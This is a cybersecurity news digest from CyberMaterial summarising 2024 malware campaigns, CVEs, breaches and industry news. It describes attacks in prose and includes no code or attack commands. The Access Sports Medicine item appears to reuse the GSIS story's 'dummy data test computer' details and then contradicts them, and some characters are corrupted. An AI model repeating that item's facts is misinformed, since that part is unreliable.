π What are the latest cybersecurity alerts, incidents, and news?
Linux, Oracle, WebLogic, Cryptocurrency, Mining, Android, Malware, Ajina Banker, Financial Data, 2FA Evasion, Iran, OilRig, Iraq, Government, Malware Campaign, Vo1d, Android TV, SolarWinds, ARM, Authentication Bypass, Remote Code Execution, Hulu, Password Resets, Unauthorized Access, Russia, Taiwan, Japan, Logistics Company, Kantsu, Cyberattack, Philippines, Government Service Insurance System, Breach, Access Sports Medicine, Personal Health Information, Leak, Pentagon, GPS Modernization, Chip Shortages, Cybersecurity, Guidance, US, Department of Labor, UK, Data Centers, Critical Infrastructure, Mastercard, Recorded Future, Acquisition, Lehigh Valley Health Network, Ransomware Attack, Lawsuit
Listen to the full podcast
π¨Β Cyber Alerts
A new malware campaign targeting Linux environments has been uncovered, exploiting Oracle WebLogic servers to deploy cryptocurrency mining software and a DDoS botnet. The malware, named Hadooken, is capable of dropping Tsunami (aka Kaiten), a notorious botnet, while also running a cryptocurrency miner. The attack leverages known vulnerabilities and weak credentials to gain initial access, then retrieves the malware through Python and shell script payloads from remote servers. Hadooken further spreads by harvesting SSH credentials to move laterally across connected systems, establishing persistence through cron jobs to maintain the crypto miner.
A new Android malware strain, Ajina.Banker, has emerged, targeting bank customers in Central Asia with the intent of stealing financial data and bypassing two-factor authentication (2FA). Discovered by Group-IB in May 2024, Ajina.Banker spreads through Telegram channels disguised as legitimate apps for banking, payment systems, and government services. Once installed, the malware accesses SMS messages, phone number APIs, and cellular network information to exfiltrate sensitive data.
Iranian cyber group OilRig has launched a sophisticated malware campaign attack against Iraqi government networks, including the Prime Minister’s Office and the Ministry of Foreign Affairs. Known also as APT34, Crambus, and several other aliases, OilRig is linked to Iran’s Ministry of Intelligence and Security (MOIS) and has a history of conducting phishing attacks and deploying custom backdoors. The latest campaign employs new malware families, Veaty and Spearal, which use advanced command-and-control mechanisms such as DNS tunneling and compromised email accounts.
Cybersecurity experts at Doctor Web have uncovered a widespread malware campaign targeting Android-based TV boxes, identified as Android.Vo1d. This malware has compromised nearly 1.3 million devices across 197 countries, making it one of the most extensive infections of its kind. Vo1d operates as a backdoor, allowing attackers to secretly install malicious software by altering critical system files. Initially detected in August 2024, Vo1d affects various models, including those running outdated Android versions, and disguises itself by mimicking legitimate system processes.
SolarWinds has disclosed critical vulnerabilities in its Access Rights Manager (ARM) platform, identified as CVE-2024-28990 and CVE-2024-28991. The first vulnerability allows attackers to bypass authentication via hard-coded credentials, potentially granting unauthorized access to the RabbitMQ management console. The second, more severe issue, enables remote code execution by exploiting deserialization of untrusted data, posing a significant risk if exploited by authenticated users.
π₯ Cyber Incidents
Hulu has issued a forced password reset for 296 accounts following unauthorized access detected on September 11, 2024. The breach, attributed to list-based account hacking, did not stem from a leak of Hulu’s own account information but rather from passwords compromised elsewhere. Affected users may have had their viewing preferences, account details, and limited payment information accessed. Hulu has responded by restricting access from the origin IP address and initiating password resets. Users are advised to reset their passwords via a link sent to their registered email.
A pro-Russia hacker group known as NoName057 has launched a distributed denial-of-service (DDoS) attack on Taiwanese government websites in retaliation for recent comments made by President William Lai. The attack targeted several local tax bureaus in New Taipei City, Keelung, Hsinchu, and Taoyuan, causing temporary outages. This action appears to be a response to Lai’s suggestion that China should address its territorial disputes with Russia, a stance perceived as a challenge to Beijing’s geopolitical ambitions.
Kantsu Co., Ltd., a Japanese logistics company, has reported a significant system outage caused by a cyberattack. The incident, identified around 6:00 p.m. on September 12, 2024, involved a ransomware virus that compromised some of the company’s servers. Following the breach, Kantsu swiftly disconnected its network to prevent further damage and established an emergency response team. The company has notified relevant authorities and engaged external security experts to investigate the attack and assess the damage.
The Government Service Insurance System (GSIS) in the Philippines has confirmed a cybersecurity breach involving a local threat actor. On September 12, 2024, GSIS was alerted by its security partner to a compromise of an administrator account on one of its test computers. The breach was publicly disclosed by the threat actor on social media. The affected computer contained only dummy data used for testing purposes, and it has been taken offline as part of the ongoing investigation. GSIS is validating the claims of the intruder and is taking measures to safeguard its systems and ensure compliance with the Data Privacy Act.
Access Sports Medicine & Orthopaedics recently announced a significant cybersecurity incident involving unauthorized access to its network. Detected on May 10, 2024, the breach was traced to a local threat actor who compromised a test computer containing dummy data. However, further investigation revealed that personal health information (PHI) of some individuals was exposed. The compromised data may include names, dates of birth, medical details, Social Security numbers, health insurance information, and limited financial data.
π’ Cyber News
The U.S. Department of Defense is facing significant delays in its GPS modernization efforts due to ongoing chip shortages and development challenges, according to a recent Government Accountability Office (GAO) report. The Space Force, responsible for upgrading the Global Positioning System (GPS) with more secure M-code technology, is struggling to meet its 2025 deadline amid setbacks in software development and testing. The report highlights that these delays jeopardize the Pentagon’s goal of maintaining a constellation of 24 operational M-code satellites through the 2030s.
The U.S. Department of Labor (DOL) has updated its cybersecurity guidance for pension and health and welfare plans in Compliance Assistance Release No. 2024-01. The revised documents now encompass health and welfare plans, broadening the scope of the original 2021 guidance. Key updates include enhanced recommendations for hiring service providers, emphasizing the need to confirm cyber insurance coverage. The updated best practices include more detailed advice on multi-factor authentication (MFA), recommending phishing-resistant MFA and timely notifications to participants in case of data breaches.
In a significant move, the UK government has officially designated data centers as critical national infrastructure. This classification highlights the essential role these facilities play in supporting the nationβs digital economy and maintaining vital services. By recognizing data centers as critical infrastructure, the government aims to bolster their protection against potential cyber threats and other risks, ensuring they remain resilient and operational.
Mastercard has announced its acquisition of the threat intelligence firm Recorded Future for $2.65 billion. This strategic purchase aims to enhance Mastercard’s cybersecurity capabilities by integrating Recorded Future’s advanced threat intelligence into its services. The acquisition will bolster Mastercard’s efforts to provide greater protection and trust in digital transactions, addressing the escalating risks of cybercrime projected to cost $9.2 trillion in 2024.
Lehigh Valley Health Network (LVHN) has agreed to a $65 million settlement over a ransomware attack that exposed sensitive data and photos of cancer patients. The settlement resolves a lawsuit stemming from the breach, which affected around 135,000 individuals whose personal information was accessed by hackers. The breach highlighted significant vulnerabilities in data security and privacy, prompting LVHN to take substantial steps to address the damages and enhance its cybersecurity measures. This resolution marks a critical move in mitigating the impact of the attack and underscores the importance of robust data protection protocols.
Β 
Copyright Β© 2024 CyberMaterial. All Rights Reserved.
